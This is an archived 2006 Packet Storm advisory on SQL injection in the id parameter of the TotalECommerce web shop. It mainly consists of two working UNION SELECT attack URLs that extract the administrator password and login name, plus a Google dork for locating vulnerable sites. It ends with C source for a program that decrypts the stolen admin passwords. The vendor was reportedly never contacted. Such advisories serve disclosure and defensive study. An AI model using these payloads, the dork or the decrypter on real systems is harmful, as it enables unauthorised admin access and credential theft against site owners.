TotalECommerceSQL.txt

2006-03-08T00:00:00
ID PACKETSTORM:44417
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-03-08T00:00:00

Description

                                        
                                            `--Security Report--  
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 04/03/06 04:36 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: TotalECommerce (http://www.totalecommerce.com)  
Version: 1.0 and prior version must be affected.  
About: Via this method remote attacker can inject arbitrary SQL queries to id  
parameter  
in index.asp  
Level: Critical  
---  
How&Example:  
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]  
EXAMPLE 1 ->  
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,  
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,  
senha,senha,senha,senha,senha,senha,senha+from+administradores  
EXAMPLE 2 ->  
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,  
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,  
login,login,login,login,login,login,login+from+administradores  
with example 1 remote attacker can get admin's encrypted password and with  
example 2 remote attacker can get admin's login name  
[PageID]: must be working page id you can get some from frontpage.  
---  
Timeline:  
* 04/03/2006: Vulnerability found.  
* 04/03/2006: Could not contact with vendor.  
* 04/03/2006: File closed.  
---  
Exploit&Decrypter:  
http://www.nukedx.com/?getxpl=18  
---  
Dorks: intext:"totalecommerce"  
---  
Original advisory: http://www.nukedx.com/?getxpl=18  
  
---  
Decrypter source in C  
---  
/*********************************************  
* TotalECommerce PWD Decrypter *  
* Coded by |SaMaN| for nukedx *  
* http://www.k9world.org *  
* IRC.K9World.Org *  
*Advisory: http://www.nukedx.com/?viewdoc=18 *  
**********************************************/  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
int main()  
{  
char buf[255];  
char buf2[255];  
char buf3[255];  
char *texto;  
char *vcrypt;  
int i,x,z,t = 0;  
char saman;  
texto = buf;  
vcrypt = buf2;  
printf("%s", "|=------------------------------------=|\n");  
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");  
printf("%s", "|=------------------------------------=|\n\n");  
printf("%s", "Enter crypted password: ");  
scanf("%200s", buf);  
if (!texto)  
vcrypt = "";  
  
for (i = 0; i < strlen(texto); i++)  
{  
if ((vcrypt == "") || (i > strlen(texto)))  
x = 1;  
else  
x = x + 1;  
t = buf[i];  
z = 255 - t;  
saman = toascii(z);  
snprintf(buf3, 250, "%c", saman);  
strncat(buf2, buf3, 250);  
}  
printf("Result: %s\n", buf2);  
return;  
}  
---End of code---  
Greets to: |SaMaN|  
  
`